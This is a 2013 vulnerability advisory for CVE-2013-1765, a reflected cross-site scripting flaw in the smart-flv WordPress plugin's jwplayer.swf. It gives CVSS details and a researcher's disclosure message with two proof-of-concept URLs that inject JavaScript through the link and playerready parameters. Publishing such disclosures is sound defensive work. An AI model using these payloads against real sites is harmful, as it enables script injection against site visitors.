WordPress plugin smart-flv jwplayer.swf XSS

2013-02-25 / 2013-02-26

Credit: Henri Salo

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2013-1765

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

With wpscan-team I noticed that file jwplayer.swf in WordPress plugin smart-flv
is vulnerable to reflected XSS vulnerability.
URL: http://wordpress.org/extend/plugins/smart-flv/
416d0313c5f286c3a8e9daff520a9f44439b93f7 http://plugins.svn.wordpress.org/smart-flv/trunk/jwplayer.swf
With user interaction (clicking the page):
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?file=1.mp4&link=javascript:alert%28%22horse%22%29&linktarget=_self&displayclick=link
No interaction:
https://example.com/wp-content/plugins/smart-flv/jwplayer.swf?playerready=alert%28%22horse%22%29
WordPress guys could you report this to the developer since I don't know his/her
email address, thanks? Could you also tell me if there is a way to contact
plugin developers directly, thank you. Please include CVE to changelog if
possible.
--
Henri Salo
ps. http://paste.nerv.fi/36167527-horse.jpeg

References:

http://paste.nerv.fi/36167527-horse.jpeg

http://seclists.org/oss-sec/2013/q1/446

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress plugin smart-flv jwplayer.swf XSS

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.